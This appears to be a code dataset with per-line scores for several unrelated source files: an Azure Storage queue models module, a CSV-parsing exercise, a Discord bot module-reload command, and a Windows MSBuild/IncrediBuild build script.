:func:`~azure.storage.queue.queueservice.QueueService.generate_queue_shared_access_signature` method and for the AccessPolicies used with :func:`~azure.storage.queue.queueservice.QueueService.set_queue_acl`. :ivar QueuePermissions QueuePermissions.READ: Read metadata and properties, including message count. Peek at messages. :ivar QueuePermissions QueuePermissions.ADD: Add messages to the queue. :ivar QueuePermissions QueuePermissions.UPDATE: Update messages in the queue. Note: Use the Process permission with Update so you can first get the message you want to update. :ivar QueuePermissions QueuePermissions.PROCESS: Delete entities. Get and delete messages from the queue. ''' def __init__(self, read=False, add=False, update=False, process=False, _str=None): ''' :param bool read: Read metadata and properties, including message count. Peek at messages. :param bool add: Add messages to the queue. :param bool update: Update messages in the queue. Note: Use the Process permission with Update so you can first get the message you want to update. :param bool process: Get and delete messages from the queue. :param str _str: A string representing the permissions. ''' if not _str: _str = '' self.read = read or ('r' in _str) self.add = add or ('a' in _str) self.update = update or ('u' in _str) self.process = process or ('p' in _str) def __or__(self, other): return QueuePermissions(_str=str(self) + str(other)) def __add__(self, other): return QueuePermissions(_str=str(self) + str(other)) def __str__(self): return (('r' if self.read else '') + ('a' if self.add else '') + ('u' if self.update else '') + ('p' if self.process else '')) QueuePermissions.READ = QueuePermissions(read=True) QueuePermissions.ADD = QueuePermissions(add=True) QueuePermissions.UPDATE = QueuePermissions(update=True) QueuePermissions.PROCESS = QueuePermissions(process=True)
[ "#-------------------------------------------------------------------------\r\n", "# Copyright (c) Microsoft. All rights reserved.\r\n", "#\r\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n", "# you may not use this file except in compliance with the License.\r\n", "# You may obtain a copy of the License at\r\n", "# http://www.apache.org/licenses/LICENSE-2.0\r\n", "#\r\n", "# Unless required by applicable law or agreed to in writing, software\r\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n", "# See the License for the specific language governing permissions and\r\n", "# limitations under the License.\r\n", "#--------------------------------------------------------------------------\r\n", "from xml.sax.saxutils import escape as xml_escape\r\n", "from xml.sax.saxutils import unescape as xml_unescape\r\n", "from base64 import (\r\n", " b64encode,\r\n", " b64decode,\r\n", ")\r\n", "from ._error import (\r\n", " _validate_message_type_bytes,\r\n", " _validate_message_type_text,\r\n", " _ERROR_MESSAGE_NOT_BASE64,\r\n", ")\r\n", "\r\n", "class Queue(object):\r\n", "\r\n", " ''' \r\n", " Queue class.\r\n", " \r\n", " :ivar str name: \r\n", " The name of the queue.\r\n", " :ivar metadata: \r\n", " A dict containing name-value pairs associated with the queue as metadata.\r\n", " This var is set to None unless the include=metadata param was included \r\n", " for the list queues operation. If this parameter was specified but the \r\n", " queue has no metadata, metadata will be set to an empty dictionary.\r\n", " :vartype metadata: dict mapping str to str\r\n", " '''\r\n", "\r\n", " def __init__(self):\r\n", " self.name = None\r\n", " self.metadata = None\r\n", "\r\n", "\r\n", "class QueueMessage(object):\r\n", " ''' \r\n", " Queue message class. \r\n", "\r\n", " :ivar str id: \r\n", " A GUID value assigned to the message by the Queue service that \r\n", " identifies the message in the queue. This value may be used together \r\n", " with the value of pop_receipt to delete a message from the queue after \r\n", " it has been retrieved with the get messages operation. \r\n", " :ivar date insertion_time: \r\n", " A UTC date value representing the time the messages was inserted.\r\n", " :ivar date expiration_time: \r\n", " A UTC date value representing the time the message expires.\r\n", " :ivar int dequeue_count: \r\n", " Begins with a value of 1 the first time the message is dequeued. This \r\n", " value is incremented each time the message is subsequently dequeued.\r\n", " :ivar obj content: \r\n", " The message content. Type is determined by the decode_function set on \r\n", " the service. Default is str.\r\n", " :ivar str pop_receipt: \r\n", " A receipt str which can be used together with the message_id element to \r\n", " delete a message from the queue after it has been retrieved with the get \r\n", " messages operation. Only returned by get messages operations. Set to \r\n", " None for peek messages.\r\n", " :ivar date time_next_visible: \r\n", " A UTC date value representing the time the message will next be visible. \r\n", " Only returned by get messages operations. Set to None for peek messages.\r\n", " '''\r\n", "\r\n", " def __init__(self):\r\n", " self.id = None\r\n", " self.insertion_time = None\r\n", " self.expiration_time = None\r\n", " self.dequeue_count = None\r\n", " self.content = None\r\n", " self.pop_receipt = None\r\n", " self.time_next_visible = None\r\n", "\r\n", "\r\n", "class QueueMessageFormat:\r\n", " ''' \r\n", " Encoding and decoding methods which can be used to modify how the queue service \r\n", " encodes and decodes queue messages. Set these to queueservice.encode_function \r\n", " and queueservice.decode_function to modify the behavior. The defaults are \r\n", " text_xmlencode and text_xmldecode, respectively.\r\n", " '''\r\n", "\r\n", " @staticmethod\r\n", " def text_base64encode(data):\r\n", " '''\r\n", " Base64 encode unicode text.\r\n", " \r\n", " :param str data: String to encode.\r\n", " :return: Base64 encoded string.\r\n", " :rtype: str\r\n", " '''\r\n", " _validate_message_type_text(data)\r\n", " return b64encode(data.encode('utf-8')).decode('utf-8')\r\n", " \r\n", " @staticmethod\r\n", " def text_base64decode(data): \r\n", " '''\r\n", " Base64 decode to unicode text.\r\n", " \r\n", " :param str data: String data to decode to unicode.\r\n", " :return: Base64 decoded string.\r\n", " :rtype: str\r\n", " ''' \r\n", " try:\r\n", " return b64decode(data.encode('utf-8')).decode('utf-8')\r\n", " except (ValueError, TypeError):\r\n", " # ValueError for Python 3, TypeError for Python 2\r\n", " raise ValueError(_ERROR_MESSAGE_NOT_BASE64)\r\n", "\r\n", " @staticmethod\r\n", " def binary_base64encode(data):\r\n", " '''\r\n", " Base64 encode byte strings.\r\n", " \r\n", " :param str data: Binary string to encode.\r\n", " :return: Base64 encoded data.\r\n", " :rtype: str\r\n", " '''\r\n", " _validate_message_type_bytes(data)\r\n", " return b64encode(data).decode('utf-8')\r\n", " \r\n", " @staticmethod\r\n", " def binary_base64decode(data):\r\n", " '''\r\n", " Base64 decode to byte string.\r\n", " \r\n", " :param str data: Data to decode to a byte string.\r\n", " :return: Base64 decoded data.\r\n", " :rtype: str\r\n", " ''' \r\n", " try:\r\n", " return b64decode(data.encode('utf-8'))\r\n", " except (ValueError, TypeError):\r\n", " # ValueError for Python 3, TypeError for Python 2\r\n", " raise ValueError(_ERROR_MESSAGE_NOT_BASE64)\r\n", "\r\n", " @staticmethod\r\n", " def text_xmlencode(data):\r\n", " ''' \r\n", " XML encode unicode text.\r\n", "\r\n", " :param str data: Unicode string to encode\r\n", " :return: XML encoded data.\r\n", " :rtype: str\r\n", " '''\r\n", " _validate_message_type_text(data)\r\n", " return xml_escape(data)\r\n", " \r\n", " @staticmethod \r\n", " def text_xmldecode(data):\r\n", " ''' \r\n", " XML decode to unicode text.\r\n", "\r\n", " :param str data: Data to decode to unicode.\r\n", " :return: XML decoded data.\r\n", " :rtype: str\r\n", " '''\r\n", " return xml_unescape(data)\r\n", "\r\n", " @staticmethod\r\n", " def noencode(data):\r\n", " ''' \r\n", " Do no encoding. \r\n", "\r\n", " :param str data: Data.\r\n", " :return: The data passed in is returned unmodified.\r\n", " :rtype: str\r\n", " '''\r\n", " return data\r\n", " \r\n", " @staticmethod\r\n", " def nodecode(data):\r\n", " '''\r\n", " Do no decoding.\r\n", " \r\n", " :param str data: Data.\r\n", " :return: The data passed in is returned unmodified.\r\n", " :rtype: str \r\n", " '''\r\n", " return data\r\n", "\r\n", "\r\n", "class QueuePermissions(object):\r\n", "\r\n", " '''\r\n", " QueuePermissions class to be used with :func:`~azure.storage.queue.queueservice.QueueService.generate_queue_shared_access_signature`\r\n", " method and for the AccessPolicies used with :func:`~azure.storage.queue.queueservice.QueueService.set_queue_acl`. \r\n", "\r\n", " :ivar QueuePermissions QueuePermissions.READ: \r\n", " Read metadata and properties, including message count. Peek at messages. \r\n", " :ivar QueuePermissions QueuePermissions.ADD: \r\n", " Add messages to the queue.\r\n", " :ivar QueuePermissions QueuePermissions.UPDATE:\r\n", " Update messages in the queue. Note: Use the Process permission with \r\n", " Update so you can first get the message you want to update.\r\n", " :ivar QueuePermissions QueuePermissions.PROCESS: Delete entities.\r\n", " Get and delete messages from the queue. \r\n", " '''\r\n", " def __init__(self, read=False, add=False, update=False, process=False, _str=None):\r\n", " '''\r\n", " :param bool read:\r\n", " Read metadata and properties, including message count. Peek at messages.\r\n", " :param bool add:\r\n", " Add messages to the queue.\r\n", " :param bool update:\r\n", " Update messages in the queue. Note: Use the Process permission with \r\n", " Update so you can first get the message you want to update.\r\n", " :param bool process: \r\n", " Get and delete messages from the queue.\r\n", " :param str _str: \r\n", " A string representing the permissions.\r\n", " '''\r\n", " if not _str:\r\n", " _str = ''\r\n", " self.read = read or ('r' in _str)\r\n", " self.add = add or ('a' in _str)\r\n", " self.update = update or ('u' in _str)\r\n", " self.process = process or ('p' in _str)\r\n", " \r\n", " def __or__(self, other):\r\n", " return QueuePermissions(_str=str(self) + str(other))\r\n", "\r\n", " def __add__(self, other):\r\n", " return QueuePermissions(_str=str(self) + str(other))\r\n", " \r\n", " def __str__(self):\r\n", " return (('r' if self.read else '') +\r\n", " ('a' if self.add else '') +\r\n", " ('u' if self.update else '') +\r\n", " ('p' if self.process else ''))\r\n", "\r\n", "QueuePermissions.READ = QueuePermissions(read=True)\r\n", "QueuePermissions.ADD = QueuePermissions(add=True)\r\n", "QueuePermissions.UPDATE = QueuePermissions(update=True)\r\n", "QueuePermissions.PROCESS = QueuePermissions(process=True)\r\n" ]
[ 0.013157894736842105, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012987012987012988, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0.1, 0, 0.14285714285714285, 0.045454545454545456, 0, 0.045454545454545456, 0.012048192771084338, 0.012345679012345678, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.1, 0.037037037037037035, 0, 0.05, 0.0136986301369863, 0.012658227848101266, 0.012345679012345678, 0.015384615384615385, 0.030303030303030304, 0, 0.029411764705882353, 0, 0.03225806451612903, 0.0125, 0, 0.04, 0.0125, 0, 0.034482758620689655, 0.012195121951219513, 0.024096385542168676, 0.012658227848101266, 0, 0.027777777777777776, 0.024096385542168676, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.1, 0.023255813953488372, 0.023809523809523808, 0.0125, 0, 0, 0, 0, 0, 0, 0, 0.1, 0, 0, 0, 0, 0, 0, 0.14285714285714285, 0, 0.02702702702702703, 0, 0, 0.1, 0, 0, 0, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.1, 0, 0, 0, 0, 0, 0, 0.14285714285714285, 0, 0, 0, 0, 0.1, 0, 0, 0, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0, 0.1111111111111111, 0.05, 0, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.07142857142857142, 0.038461538461538464, 0, 0, 0, 0, 0, 0, 0.1, 0, 0, 0, 0, 0.1, 0, 0, 0.034482758620689655, 0, 0, 0, 0, 0, 0, 0, 0.007246376811594203, 0.016666666666666666, 0, 0.019230769230769232, 0.024096385542168676, 0.0196078431372549, 0, 0, 0.01282051282051282, 0, 0, 0.02, 0, 0.011363636363636364, 0, 0, 0.011627906976744186, 0, 0, 0, 0.012195121951219513, 0, 0.03225806451612903, 0, 0.037037037037037035, 0, 0, 0, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0.16666666666666666, 0, 0, 0, 0, 0, 0, 0.018867924528301886, 0, 0, 0 ]
246
0.01312
false
# Your task is to read the input DATAFILE line by line, and for the first 10 lines (not including the header) # split each line on "," and then for each line, create a dictionary # where the key is the header title of the field, and the value is the value of that field in the row. # The function parse_file should return a list of dictionaries, # each data line in the file being a single list entry. # Field names and values should not contain extra whitespace, like spaces or newline characters. # You can use the Python string method strip() to remove the extra whitespace. # You have to parse only the first 10 data lines in this exercise, # so the returned list should have 10 entries! import os DATADIR = "Lesson_1_Data_Extraction_Fundamentals\\07-Parsing_CSV_Files" DATAFILE = "beatles-diskography.csv" def parse_file(datafile): data = [] with open(datafile, "rb") as f: header = f.readline().strip().split(',') for i, line in enumerate(f): values = line.strip().split(',') item = dict(zip(header, values)) data.append(item) if i > 9: break return data def test(): # a simple test of your implemetation datafile = os.path.join(DATADIR, DATAFILE) d = parse_file(datafile) firstline = {'Title': 'Please Please Me', 'UK Chart Position': '1', 'Label': 'Parlophone(UK)', 'Released': '22 March 1963', 'US Chart Position': '-', 'RIAA Certification': 'Platinum', 'BPI Certification': 'Gold'} tenthline = {'Title': '', 'UK Chart Position': '1', 'Label': 'Parlophone(UK)', 'Released': '10 July 1964', 'US Chart Position': '-', 'RIAA Certification': '', 'BPI Certification': 'Gold'} assert d[0] == firstline assert d[9] == tenthline test()
[ "# Your task is to read the input DATAFILE line by line, and for the first 10 lines (not including the header)\n", "# split each line on \",\" and then for each line, create a dictionary\n", "# where the key is the header title of the field, and the value is the value of that field in the row.\n", "# The function parse_file should return a list of dictionaries,\n", "# each data line in the file being a single list entry.\n", "# Field names and values should not contain extra whitespace, like spaces or newline characters.\n", "# You can use the Python string method strip() to remove the extra whitespace.\n", "# You have to parse only the first 10 data lines in this exercise,\n", "# so the returned list should have 10 entries!\n", "import os\n", "\n", "DATADIR = \"Lesson_1_Data_Extraction_Fundamentals\\\\07-Parsing_CSV_Files\"\n", "DATAFILE = \"beatles-diskography.csv\"\n", "\n", "\n", "def parse_file(datafile):\n", " data = []\n", " with open(datafile, \"rb\") as f:\n", " header = f.readline().strip().split(',')\n", " for i, line in enumerate(f):\n", " values = line.strip().split(',')\n", " item = dict(zip(header, values))\n", " data.append(item)\n", " if i > 9: break\n", "\n", " return data\n", "\n", "\n", "def test():\n", " # a simple test of your implemetation\n", " datafile = os.path.join(DATADIR, DATAFILE)\n", " d = parse_file(datafile)\n", " firstline = {'Title': 'Please Please Me', 'UK Chart Position': '1', 'Label': 'Parlophone(UK)', 'Released': '22 March 1963', 'US Chart Position': '-', 'RIAA Certification': 'Platinum', 'BPI Certification': 'Gold'}\n", " tenthline = {'Title': '', 'UK Chart Position': '1', 'Label': 'Parlophone(UK)', 'Released': '10 July 1964', 'US Chart Position': '-', 'RIAA Certification': '', 'BPI Certification': 'Gold'}\n", "\n", " assert d[0] == firstline\n", " assert d[9] == tenthline\n", "\n", " \n", "test()" ]
[ 0.00909090909090909, 0, 0.009708737864077669, 0, 0, 0.010309278350515464, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0, 0, 0, 0, 0, 0, 0, 0.004608294930875576, 0.005208333333333333, 0, 0, 0, 0, 0.2, 0.16666666666666666 ]
40
0.011033
false
from importlib import reload as reimport import discord async def reload(cmd, message, args): if not args: cmd.log.info('---------------------------------') cmd.log.info('Reloading all modules...') cmd.bot.ready = False response = discord.Embed(color=0xF9F9F9, title='⚗ Reloading all modules...') load_status = await message.channel.send(embed=response) cmd.bot.init_modules() cmd_count = len(cmd.bot.modules.commands) ev_count = 0 for key in cmd.bot.modules.events: event_group = cmd.bot.modules.events[key] ev_count += len(event_group) load_end_title = f'✅ Loaded {cmd_count} Commands and {ev_count} Events.' load_done_response = discord.Embed(color=0x77B255, title=load_end_title) await load_status.edit(embed=load_done_response) cmd.bot.ready = True cmd.log.info(f'Loaded {cmd_count} commands and {ev_count} events.') cmd.log.info('---------------------------------') else: command_name = ' '.join(args) response = discord.Embed() if command_name not in cmd.bot.modules.commands.keys(): response.colour = 0xBE1931 response.title = f'❗ Command `{command_name}` was not found.' else: module_to_reload = cmd.bot.modules.commands[command_name].command reimport(module_to_reload) response.colour = 0x77B255 response.title = f'✅ Command `{command_name}` was reloaded.' await message.channel.send(embed=response)
[ "from importlib import reload as reimport\n", "\n", "import discord\n", "\n", "\n", "async def reload(cmd, message, args):\n", " if not args:\n", " cmd.log.info('---------------------------------')\n", " cmd.log.info('Reloading all modules...')\n", " cmd.bot.ready = False\n", " response = discord.Embed(color=0xF9F9F9, title='⚗ Reloading all modules...')\n", " load_status = await message.channel.send(embed=response)\n", " cmd.bot.init_modules()\n", " cmd_count = len(cmd.bot.modules.commands)\n", " ev_count = 0\n", " for key in cmd.bot.modules.events:\n", " event_group = cmd.bot.modules.events[key]\n", " ev_count += len(event_group)\n", " load_end_title = f'✅ Loaded {cmd_count} Commands and {ev_count} Events.'\n", " load_done_response = discord.Embed(color=0x77B255, title=load_end_title)\n", " await load_status.edit(embed=load_done_response)\n", " cmd.bot.ready = True\n", " cmd.log.info(f'Loaded {cmd_count} commands and {ev_count} events.')\n", " cmd.log.info('---------------------------------')\n", " else:\n", " command_name = ' '.join(args)\n", " response = discord.Embed()\n", " if command_name not in cmd.bot.modules.commands.keys():\n", " response.colour = 0xBE1931\n", " response.title = f'❗ Command `{command_name}` was not found.'\n", " else:\n", " module_to_reload = cmd.bot.modules.commands[command_name].command\n", " reimport(module_to_reload)\n", " response.colour = 0x77B255\n", " response.title = f'✅ Command `{command_name}` was reloaded.'\n", " await message.channel.send(embed=response)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
36
0.001013
false
#!python3 # -*- coding:utf-8 -*- import os import sys import time import ctypes import shutil import subprocess IsPy3 = sys.version_info[0] >= 3 if IsPy3: import winreg else: import codecs import _winreg as winreg BuildType = 'Release' IsRebuild = True Build = 'Rebuild' Update = False Copy = False CleanAll = False BuildTimeout = 30*60 Bit = 'Win32' Dlllib = 'dll' MSBuild = None IncrediBuild = None UseMSBuild = True #默认用MSBuild编译,如果为False则用IncrediBuild编译 #不同项目只需修改下面5个变量 SlnFile = '../ReadWriteMutex.sln' #相对于本py脚本路径的相对路径 UpdateDir = [] #相对于本py脚本路径的相对路径,填空不更新 ExecBatList = [] #相对于本py脚本路径的相对路径,编译前调用的脚本,可填空,执行bat会先cd到bat目录再执行 MSBuildFirstProjects = [r'ReadWriteMutex'] #使用MSBuild需要工程文件在解决方案sln中的路径 # MSBuild首先编译的项目,填空不指定顺序 IncrediBuildFirstProjects = ['ReadWriteMutex'] #使用IncrediBuild只需工程名字 #IncrediBuild首先编译的项目,填空不指定顺序 class ConsoleColor(): '''This class defines the values of color for printing on console window''' Black = 0 DarkBlue = 1 DarkGreen = 2 DarkCyan = 3 DarkRed = 4 DarkMagenta = 5 DarkYellow = 6 Gray = 7 DarkGray = 8 Blue = 9 Green = 10 Cyan = 11 Red = 12 Magenta = 13 Yellow = 14 White = 15 class Coord(ctypes.Structure): _fields_ = [('X', ctypes.c_short), ('Y', ctypes.c_short)] class SmallRect(ctypes.Structure): _fields_ = [('Left', ctypes.c_short), ('Top', ctypes.c_short), ('Right', ctypes.c_short), ('Bottom', ctypes.c_short), ] class ConsoleScreenBufferInfo(ctypes.Structure): _fields_ = [('dwSize', Coord), ('dwCursorPosition', Coord), ('wAttributes', ctypes.c_uint), ('srWindow', SmallRect), ('dwMaximumWindowSize', Coord), ] class Win32API(): '''Some native methods for python calling''' StdOutputHandle = -11 ConsoleOutputHandle = None DefaultColor = None @staticmethod def SetConsoleColor(color): '''Change the text color on console window''' if not Win32API.DefaultColor: if not Win32API.ConsoleOutputHandle: Win32API.ConsoleOutputHandle = ctypes.windll.kernel32.GetStdHandle(Win32API.StdOutputHandle) bufferInfo = ConsoleScreenBufferInfo() ctypes.windll.kernel32.GetConsoleScreenBufferInfo(Win32API.ConsoleOutputHandle, ctypes.byref(bufferInfo)) Win32API.DefaultColor = int(bufferInfo.wAttributes & 0xFF) if IsPy3: sys.stdout.flush() # need flush stdout in python 3 ctypes.windll.kernel32.SetConsoleTextAttribute(Win32API.ConsoleOutputHandle, color) @staticmethod def ResetConsoleColor(): '''Reset the default text color on console window''' if IsPy3: sys.stdout.flush() # need flush stdout in python 3 ctypes.windll.kernel32.SetConsoleTextAttribute(Win32API.ConsoleOutputHandle, Win32API.DefaultColor) class Logger(): LogFile = '@AutomationLog.txt' LineSep = '\n' @staticmethod def Write(log, consoleColor = -1, writeToFile = True, printToStdout = True): ''' consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen if consoleColor == -1, use default color ''' if printToStdout: isValidColor = (consoleColor >= ConsoleColor.Black and consoleColor <= ConsoleColor.White) if isValidColor: Win32API.SetConsoleColor(consoleColor) try: sys.stdout.write(log) except UnicodeError as e: Win32API.SetConsoleColor(ConsoleColor.Red) isValidColor = True sys.stdout.write(str(type(e)) + ' can\'t print the log!\n') if isValidColor: Win32API.ResetConsoleColor() if not writeToFile: return if IsPy3: logFile = open(Logger.LogFile, 'a+', encoding = 'utf-8') else: logFile = codecs.open(Logger.LogFile, 'a+', 'utf-8') try: logFile.write(log) # logFile.flush() # need flush in python 3, otherwise log won't be saved except Exception as ex: logFile.close() sys.stdout.write('can not write log with exception: {0} {1}'.format(type(ex), ex)) @staticmethod def WriteLine(log, consoleColor = -1, writeToFile = True, printToStdout = True): ''' consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen if consoleColor == -1, use default color ''' Logger.Write(log + Logger.LineSep, consoleColor, writeToFile, printToStdout) @staticmethod def Log(log, consoleColor = -1, writeToFile = True, printToStdout = True): ''' consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen if consoleColor == -1, use default color ''' t = time.localtime() log = '{0}-{1:02}-{2:02} {3:02}:{4:02}:{5:02} - {6}{7}'.format(t.tm_year, t.tm_mon, t.tm_mday, t.tm_hour, t.tm_min, t.tm_sec, log, Logger.LineSep) Logger.Write(log, consoleColor, writeToFile, printToStdout) @staticmethod def DeleteLog(): if os.path.exists(Logger.LogFile): os.remove(Logger.LogFile) def GetMSBuildPath(): if Bit == 'Win32': cmd = 'call "%VS120COMNTOOLS%..\\..\\VC\\vcvarsall.bat" x86\nwhere msbuild' elif Bit == 'x64': cmd = 'call "%VS120COMNTOOLS%..\\..\\VC\\vcvarsall.bat" amd64\nwhere msbuild' ftemp = open('GetMSBuildPath.bat', 'wt') ftemp.write(cmd) ftemp.close() p = subprocess.Popen('GetMSBuildPath.bat', stdout = subprocess.PIPE) p.wait() lines = p.stdout.read().decode().splitlines() os.remove('GetMSBuildPath.bat') for line in lines: if 'MSBuild.exe' in line: return line def GetIncrediBuildPath(): try: key=winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r'SOFTWARE\Classes\IncrediBuild.MonitorFile\shell\open\command') value, typeId = winreg.QueryValueEx(key, '') if value: start = value.find('"') end = value.find('"', start + 1) path = value[start+1:end] buildConsole = os.path.join(os.path.dirname(path), 'BuildConsole.exe') return buildConsole except FileNotFoundError as e: Logger.WriteLine('can not find IncrediBuild', ConsoleColor.Red) def UpdateCode(): # put git to path first if not shutil.which('git.exe'): Logger.Log('找不到git.exe. 请确认安装git时将git\bin目录路径加入到环境变量path中!!!\n, 跳过更新代码!!!', ConsoleColor.Yellow) return false oldDir = os.getcwd() for dir in UpdateDir: os.chdir(dir) ret = os.system('git pull') os.chdir(oldDir) if ret != 0: Logger.Log('update {0} failed'.format(dir), ConsoleColor.Yellow) return false return True def BuildProject(cmd): for i in range(6): Logger.WriteLine(cmd, ConsoleColor.Cyan) buildFailed = True startTime = time.time() p = subprocess.Popen(cmd) #IncrediBuild不能使用stdout=subprocess.PIPE,否则会导致p.wait()不返回,可能是IncrediBuild的bug if IsPy3: try: buildFailed = p.wait(BuildTimeout) except subprocess.TimeoutExpired as e: Logger.Log('{0}'.format(e), ConsoleColor.Yellow) p.kill() else: buildFailed = p.wait() if not UseMSBuild: #IncrediBuild的返回值不能说明编译是否成功,需要提取输出判断 fin = open('IncrediBuild.log') for line in fin: if line.startswith('=========='): Logger.Write(line, ConsoleColor.Cyan, writeToFile = True if IsPy3 else False) if IsPy3: start = line.find('失败') + 3 #========== 生成: 成功 1 个,失败 0 个,最新 0 个,跳过 0 个 ========== else:#为了兼容py2做的特殊处理,很恶心 start = 0 n2 = 0 while 1: if line[start].isdigit(): n2 += 1 if n2 == 2: break start = line.find(' ', start) start += 1 end = line.find(' ', start) failCount = int(line[start:end]) buildFailed = failCount > 0 else: Logger.Write(line, ConsoleColor.Red, writeToFile = True if IsPy3 else False, printToStdout = True if ' error ' in line else False) fin.close() costTime = time.time() - startTime Logger.WriteLine('build cost time: {0:.1f}s\n'.format(costTime), ConsoleColor.Green) if not buildFailed: return True return False def BuildAllProjects(): buildSuccess = False cmds = [] if UseMSBuild: if IsRebuild: if CleanAll: cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, 'Debug')) cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, 'Release')) else: cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, BuildType)) for project in MSBuildFirstProjects: cmds.append('{0} {1} /t:{2} /p:Configuration={3};platform={4} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, project, BuildType, Bit)) cmds.append('{0} {1} /p:Configuration={2};platform={3} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, BuildType, Bit)) else: #IncrediBuild if IsRebuild: if CleanAll: cmds.append('"{0}" {1} /clean /cfg="{2}|{3}" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, 'Debug', Bit)) cmds.append('"{0}" {1} /clean /cfg="{2}|{3}" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, 'Release', Bit)) else: cmds.append('"{0}" {1} /clean /cfg="{2}|{3}" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, BuildType, Bit)) for project in IncrediBuildFirstProjects: cmds.append('"{0}" {1} /build /prj={2} /cfg="{3}|{4}" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, project, BuildType, Bit)) cmds.append('"{0}" {1} /build /cfg="{2}|{3}" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, BuildType, Bit)) for cmd in cmds: buildSuccess = BuildProject(cmd) if not buildSuccess: break return buildSuccess def main(): if UseMSBuild: if not os.path.exists(MSBuild): Logger.Log('can not find msbuild.exe', ConsoleColor.Red) return 1 else: if not os.path.exists(IncrediBuild): Logger.Log('can not find msbuild.exe', ConsoleColor.Red) return 1 dir = os.path.dirname(__file__) if dir: oldDir = os.getcwd() os.chdir(dir) if Update: if not UpdateCode(): return 1 Logger.Log('git update succeed', ConsoleColor.Green) if Copy: for bat in ExecBatList: oldBatDir = os.getcwd() batDir = os.path.dirname(bat) batName = os.path.basename(bat) if batDir: os.chdir(batDir) start = time.clock() os.system(batName) Logger.Log('run "{}" cost {:.1f} seconds'.format(batName, time.clock() - start), ConsoleColor.Green) if batDir: os.chdir(oldBatDir) buildSuccess = BuildAllProjects() if buildSuccess: Logger.Log('build succeed', ConsoleColor.Green) else: Logger.Log('build failed', ConsoleColor.Red) if dir: os.chdir(oldDir) return 0 if buildSuccess else 1 if __name__ == '__main__': Logger.Log('run with argv ' + str(sys.argv), ConsoleColor.Green) sys.argv = [x.lower() for x in sys.argv] start_time = time.time() if 'debug' in sys.argv: BuildType = 'Debug' if 'lib' in sys.argv: Dlllib = 'lib' SlnFile = '../ReadWriteMutex_lib.sln' MSBuildFirstProjects = [r'ReadWriteMutex_lib'] IncrediBuildFirstProjects = ['ReadWriteMutex_lib'] if '64' in sys.argv: Bit = 'x64' if 'build' in sys.argv: IsRebuild = False Build = 'Build' if 'update' in sys.argv: Update = True if 'copy' in sys.argv: Copy = True if 'clean' in sys.argv: CleanAll = True if 'incredibuild' in sys.argv: UseMSBuild = False if UseMSBuild: MSBuild = GetMSBuildPath() if not MSBuild: Logger.Log('can not find MSBuild.exe', ConsoleColor.Red) exit(1) else: IncrediBuild = GetIncrediBuildPath() if not IncrediBuild: Logger.Log('can not find BuildConsole.exe', ConsoleColor.Red) exit(1) cwd = os.getcwd() Logger.WriteLine('current dir is: {0}, {1}: {2}'.format(cwd, Build, BuildType)) ret = main() end_time = time.time() cost_time = end_time-start_time Logger.WriteLine('all build cost time: {0:.2f} seconds'.format(cost_time), ConsoleColor.Green) exit(ret)
